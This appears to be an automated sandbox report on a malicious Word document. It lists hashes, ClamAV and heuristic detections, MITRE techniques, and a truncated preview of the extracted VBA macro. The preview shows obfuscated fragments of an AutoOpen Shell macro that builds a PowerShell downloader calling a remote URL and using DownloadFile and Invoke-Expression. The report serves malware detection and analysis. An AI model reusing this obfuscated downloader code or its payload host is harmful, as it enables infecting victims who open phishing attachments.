Office (OLE) malware analysis — malicious · bcf0203316eb837e

MALICIOUS

Office (OLE)

294.0 KB Created: 2017-12-06 15:28:00 Authoring application: Microsoft Office Word First seen: 2017-12-09

MD5: ef84a6845ead2a7861b322358e3ac974 SHA-1: e2c1abce79738fd119d19ff6393ee024b1c27b1e SHA-256: bcf0203316eb837e48be3dc38592cf56f905b0b2e34d9a20196c633d10ccf9b0

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro, detected by multiple heuristics, uses the Shell() function to execute a command. The script reconstructs a URL, 'http://www.4chaou.com/modules/Ahku8BM/', which is likely used to download and execute a second-stage payload. This indicates a macro-based downloader attack pattern.

Heuristics 7

ClamAV: Doc.Macro.Obfuscation-6394109-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.u0DIP+DIPT+u0Txu0T+u0Tn--- In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 49898 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	49898 bytes
SHA-256: `b243cfed6805dc23a8c7be069d5fa4a029efe990461ec59ddf07fc299c84e6a1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "ZrWFZaFkQoYEA" Function iAXTUiz() JEUAPdRjq = Array(UCase("dhiLEUQXpwLw" + "vUGbbWcnscflm" + "wNWOnjSUJ" + "VcdzWIDsMMXv" + "UpNqzkECZRAR")) HcnqYpScV = Mid("GJNW5zfPfS80Tb'+'tbcfkecv2kDIP+DIPf1au0'+'T+u0T.xn-u0T+u0T-p1ai/eq/u'+'0T+u0TKdbu0T+u0T.Split(Kdb,Kdb);Geykarapu'+'0T+u0Tasu0T+u0T = u0T+u0TGeynsadau0T+u0Tsdu0T+u0MGYwRX0", 12, 152) htmtDlpPona = Array(UCase("nHBLbQDYFKS" + "LRHwGidHdj" + "wsLXIHUrhqijws" + "OGSfYwDzqRjj" + "PuzCDKFTQsvQkS")) WEfamuQkC = Array(UCase("SjXRZbKX" + "ztcQkYn" + "ZvCbCYZpVk" + "jvKchNq" + "VumwkOOqUN")) EwZLS = Array(UCase("YFCESiFawWE" + "wUdisAQ" + "jYPWscXU" + "uLEunohfAJKfwU" + "NRVKwifSRw")) qOGZFSkFw = Mid("JPP8+[chDIP+DIPAR]102+DIP+DIP[cDIP+'+'DIPhAR]83),['+'STrIng][chAR]92)aDYINVOke-ExpDIP+DIPRESS0iY9itomVLfTIqH", 3, 91) HHCXrLNOiwW = Array(UCase("zfPArFOhQLzc" + "rFqJoQv" + "uESinzS" + "nhFcokZRu" + "XSfZIXSiF")) WoKJK = Array(UCase("AqfLpGkiCKzLJj" + "wrqGbiDqIaHMYS" + "tnwporzpT" + "uTSNNFM" + "AfobLWPwzXk")) LWpMSEH = Array(UCase("NwkptzKXwl" + "wGHjtiCvaHnNTl" + "hWwozwujQz" + "AwmmIoTOq" + "CpjklQNRalRET")) ajQpDOvzd = Mid("jF16DkmZ+u0TDIP+DIPbcd = KdDIP+DIPu0T+u0Tbhttpu0T+u0T'+'s:/'+'/u0T+u0Tww'+'w.DIP+DIP4chDIP+DIPoau0T+u0T.cDIP+DIPoDIP+DIPmu0T+u0T/u0T+u0Tmu0T+u0Todules/u0T+u0TAu0T+u0Thku0T+u0T8BM/,httpu0jhP3wiL7FAJP0Vp", 9, 178) ZYAtzAJ = Array(UCase("uLLnQMPTsDzC" + "DhOlduVuiX" + "aSbZassbElJiI" + "wBqsmzjmEIo" + "KWdPnMo")) wjZAZbdd = Array(UCase("oYJnzEWri" + "iDInwztFujf" + "PDMjjSqMzvf" + "zkijRlWKHH" + "hHZSasM")) NqCcAMi = Array(UCase("EFfYAdRjBJzs" + "ElCqzjFAo" + "InvrKodZUEXvJo" + "kOQGYOHHw" + "XhnadNiQJ")) UjQMGbthcq = Mid("OH4V0JctItem(Geyhr3fQqhKY", 9, 9) sQscrmUpjm = Array(UCase("nmIJGbQX" + "BWdiYoq" + "UNnJJUZHw" + "YGAPTnlripa" + "EAOSJkdXJT")) vzZuNSUi = Array(UCase("kFlGuXjcnt" + "bObMRouP" + "AfwdmGqzrrof" + "RiidJLA" + "fUDFwTMNLYo")) COPmhMoNY = Array(UCase("MjdADwFiFzBAW" + "TpLvIbnz" + "VQNFIYusAvjKlM" + "PvotsfTVtV" + "EurQZFP")) FuwsKzuViM = Mid("Aauj5ukIonDIP).repLace(DIPaDYDIP,[STrINg][char]124).repLace(([char]117'+'+[ch'+'ar]48+[ch'+'ar]84),[STrINonzkkEA3luvki7OnuDc4Zb", 8, 98) wzfpPqTKhb = Array(UCase("bVEHHTo" + "klwFcbwwhofi" + "CVLuYqndl" + "SAfZvZXVqXT" + "uXzdUWQfXtFmYA")) bMqrTdTKcm = Array(UCase("HjpszFKEBFqAh" + "ofMmtFPCvUk" + "TABkVav" + "FnZDrnhbSPDVWc" + "LDnMJZE")) DBquwczpmoZ = Array(UCase("LvPMkBBTNVBBO" + "EAPjzdwvkpjmpI" + "mjqzBnFILRimzY" + "EFfzBlVkIbuP" + "adzMtTbo")) stGQCdUdQaI = Mid("pfZ18fk1wLobQoXvnjLzWnbrg][char]39)'+MYu6j", 25, 13) hhoZdj = Array(UCase("VIsmJCQkPEkWA" + "JuFYokf" + "OhqupjiOl" + "AzEuwBXYBf" + "QlGFGusGllUIE")) MLEGLihJJFs = Array(UCase("BMHwsDSV" + "BWzldGrGOQwiY" + "XviiTRtd" + "vtESpDsSSmlttK" + "zrUmFKsccFkDJ")) QipvwzkVTno = Array(UCase("HpAlAawawD" + "AJMwrKdwJZiX" + "aoklUzfSLwbzV" + "GWacVjzMFUrA" + "qUbwcSLLMqNGzX")) PnjaOLFLZsE = Mid("wbBfYO3mfXlGnbsV6IP+DIPu0Tyfru0T'+'+u0Tanc.Downloau0T+u0Tdu0'+'T+u0TFileu0T+u'+'0T(u'+'0T+u0TGeyabc.u'+'0T+u0TTu0T+usE53miL", 18, 99) XCTnfcf = Array(UCase("wEwYZErZnC" + "VzdvmNi" + "tjczGXnDRbNF" + "izUioVUGzZDSjj" + "OhqsFTQl")) YoaDuUm = Array(UCase("oKlwWcWZiw" + "rqOiPtTE" + "wjBzjJWujNWYI" + "XujsiTTvtAT" + "VzdaUmthWFJ")) FKsXrmZdzfV = Array(UCase("GYCiZYXf" + "SZwMhSb" + "ZnXPnDdr" + "sjiQwmikA" + "mKuYkfSwiJAr")) dwSmdf = Mid("Dmuxtu0'+'T+u0T(1,u0T+u0T 3u0T+u0T4324u0T+u0T5);Geyhuu0T+u0Tau0T+u0Ts u0T+u0T= Gu0T+u0Teu0T+u0Tyeu0'+'T+BowiSM6fBj", 4, 101) dJazSIHL = Array(UCase("SMFcsVZkiNqo" + "ApkWCqAfFoYQ" + "tkfaHSl" + "aRNqCYbjsHGptT" + "ILTOIGMYjMmbpE")) dwAffvndOL = Array(UCase("kaCBhsSUZ" + "LfqBkWnRbjjoB" + "OmjVHuhNBRt" + "tkzrhNNTjtudi" + "vrYKiwYXmuJ")) RVoDQfXkcfQ = Array(UCase("GESBOWtYJEX" + "wjGTAiidatjA" + "YTBqcdjLLrn" + "nzlaSSM" + "UMwZAIHHhCN")) NYwEZZ = Mid("JqO1n6YUzOf7I8LcRjtF8GPDIP+DIP0ToStu' ... (truncated)

SHA-256: b243cfed6805dc23a8c7be069d5fa4a029efe990461ec59ddf07fc299c84e6a1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ZrWFZaFkQoYEA"
Function iAXTUiz()
JEUAPdRjq = Array(UCase("dhiLEUQXpwLw" + "vUGbbWcnscflm" + "wNWOnjSUJ" + "VcdzWIDsMMXv" + "UpNqzkECZRAR"))
HcnqYpScV = Mid("GJNW5zfPfS80Tb'+'tbcfkecv2kDIP+DIPf1au0'+'T+u0T.xn-u0T+u0T-p1ai/eq/u'+'0T+u0TKdbu0T+u0T.Split(Kdb,Kdb);Geykarapu'+'0T+u0Tasu0T+u0T = u0T+u0TGeynsadau0T+u0Tsdu0T+u0MGYwRX0", 12, 152)
htmtDlpPona = Array(UCase("nHBLbQDYFKS" + "LRHwGidHdj" + "wsLXIHUrhqijws" + "OGSfYwDzqRjj" + "PuzCDKFTQsvQkS"))
WEfamuQkC = Array(UCase("SjXRZbKX" + "ztcQkYn" + "ZvCbCYZpVk" + "jvKchNq" + "VumwkOOqUN"))
EwZLS = Array(UCase("YFCESiFawWE" + "wUdisAQ" + "jYPWscXU" + "uLEunohfAJKfwU" + "NRVKwifSRw"))
qOGZFSkFw = Mid("JPP8+[chDIP+DIPAR]102+DIP+DIP[cDIP+'+'DIPhAR]83),['+'STrIng][chAR]92)aDYINVOke-ExpDIP+DIPRESS0iY9itomVLfTIqH", 3, 91)
HHCXrLNOiwW = Array(UCase("zfPArFOhQLzc" + "rFqJoQv" + "uESinzS" + "nhFcokZRu" + "XSfZIXSiF"))
WoKJK = Array(UCase("AqfLpGkiCKzLJj" + "wrqGbiDqIaHMYS" + "tnwporzpT" + "uTSNNFM" + "AfobLWPwzXk"))
LWpMSEH = Array(UCase("NwkptzKXwl" + "wGHjtiCvaHnNTl" + "hWwozwujQz" + "AwmmIoTOq" + "CpjklQNRalRET"))
ajQpDOvzd = Mid("jF16DkmZ+u0TDIP+DIPbcd = KdDIP+DIPu0T+u0Tbhttpu0T+u0T'+'s:/'+'/u0T+u0Tww'+'w.DIP+DIP4chDIP+DIPoau0T+u0T.cDIP+DIPoDIP+DIPmu0T+u0T/u0T+u0Tmu0T+u0Todules/u0T+u0TAu0T+u0Thku0T+u0T8BM/,httpu0jhP3wiL7FAJP0Vp", 9, 178)
ZYAtzAJ = Array(UCase("uLLnQMPTsDzC" + "DhOlduVuiX" + "aSbZassbElJiI" + "wBqsmzjmEIo" + "KWdPnMo"))
wjZAZbdd = Array(UCase("oYJnzEWri" + "iDInwztFujf" + "PDMjjSqMzvf" + "zkijRlWKHH" + "hHZSasM"))
NqCcAMi = Array(UCase("EFfYAdRjBJzs" + "ElCqzjFAo" + "InvrKodZUEXvJo" + "kOQGYOHHw" + "XhnadNiQJ"))
UjQMGbthcq = Mid("OH4V0JctItem(Geyhr3fQqhKY", 9, 9)
sQscrmUpjm = Array(UCase("nmIJGbQX" + "BWdiYoq" + "UNnJJUZHw" + "YGAPTnlripa" + "EAOSJkdXJT"))
vzZuNSUi = Array(UCase("kFlGuXjcnt" + "bObMRouP" + "AfwdmGqzrrof" + "RiidJLA" + "fUDFwTMNLYo"))
COPmhMoNY = Array(UCase("MjdADwFiFzBAW" + "TpLvIbnz" + "VQNFIYusAvjKlM" + "PvotsfTVtV" + "EurQZFP"))
FuwsKzuViM = Mid("Aauj5ukIonDIP).repLace(DIPaDYDIP,[STrINg][char]124).repLace(([char]117'+'+[ch'+'ar]48+[ch'+'ar]84),[STrINonzkkEA3luvki7OnuDc4Zb", 8, 98)
wzfpPqTKhb = Array(UCase("bVEHHTo" + "klwFcbwwhofi" + "CVLuYqndl" + "SAfZvZXVqXT" + "uXzdUWQfXtFmYA"))
bMqrTdTKcm = Array(UCase("HjpszFKEBFqAh" + "ofMmtFPCvUk" + "TABkVav" + "FnZDrnhbSPDVWc" + "LDnMJZE"))
DBquwczpmoZ = Array(UCase("LvPMkBBTNVBBO" + "EAPjzdwvkpjmpI" + "mjqzBnFILRimzY" + "EFfzBlVkIbuP" + "adzMtTbo"))
stGQCdUdQaI = Mid("pfZ18fk1wLobQoXvnjLzWnbrg][char]39)'+MYu6j", 25, 13)
hhoZdj = Array(UCase("VIsmJCQkPEkWA" + "JuFYokf" + "OhqupjiOl" + "AzEuwBXYBf" + "QlGFGusGllUIE"))
MLEGLihJJFs = Array(UCase("BMHwsDSV" + "BWzldGrGOQwiY" + "XviiTRtd" + "vtESpDsSSmlttK" + "zrUmFKsccFkDJ"))
QipvwzkVTno = Array(UCase("HpAlAawawD" + "AJMwrKdwJZiX" + "aoklUzfSLwbzV" + "GWacVjzMFUrA" + "qUbwcSLLMqNGzX"))
PnjaOLFLZsE = Mid("wbBfYO3mfXlGnbsV6IP+DIPu0Tyfru0T'+'+u0Tanc.Downloau0T+u0Tdu0'+'T+u0TFileu0T+u'+'0T(u'+'0T+u0TGeyabc.u'+'0T+u0TTu0T+usE53miL", 18, 99)
XCTnfcf = Array(UCase("wEwYZErZnC" + "VzdvmNi" + "tjczGXnDRbNF" + "izUioVUGzZDSjj" + "OhqsFTQl"))
YoaDuUm = Array(UCase("oKlwWcWZiw" + "rqOiPtTE" + "wjBzjJWujNWYI" + "XujsiTTvtAT" + "VzdaUmthWFJ"))
FKsXrmZdzfV = Array(UCase("GYCiZYXf" + "SZwMhSb" + "ZnXPnDdr" + "sjiQwmikA" + "mKuYkfSwiJAr"))
dwSmdf = Mid("Dmuxtu0'+'T+u0T(1,u0T+u0T 3u0T+u0T4324u0T+u0T5);Geyhuu0T+u0Tau0T+u0Ts u0T+u0T= Gu0T+u0Teu0T+u0Tyeu0'+'T+BowiSM6fBj", 4, 101)
dJazSIHL = Array(UCase("SMFcsVZkiNqo" + "ApkWCqAfFoYQ" + "tkfaHSl" + "aRNqCYbjsHGptT" + "ILTOIGMYjMmbpE"))
dwAffvndOL = Array(UCase("kaCBhsSUZ" + "LfqBkWnRbjjoB" + "OmjVHuhNBRt" + "tkzrhNNTjtudi" + "vrYKiwYXmuJ"))
RVoDQfXkcfQ = Array(UCase("GESBOWtYJEX" + "wjGTAiidatjA" + "YTBqcdjLLrn" + "nzlaSSM" + "UMwZAIHHhCN"))
NYwEZZ = Mid("JqO1n6YUzOf7I8LcRjtF8GPDIP+DIP0ToStu'
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.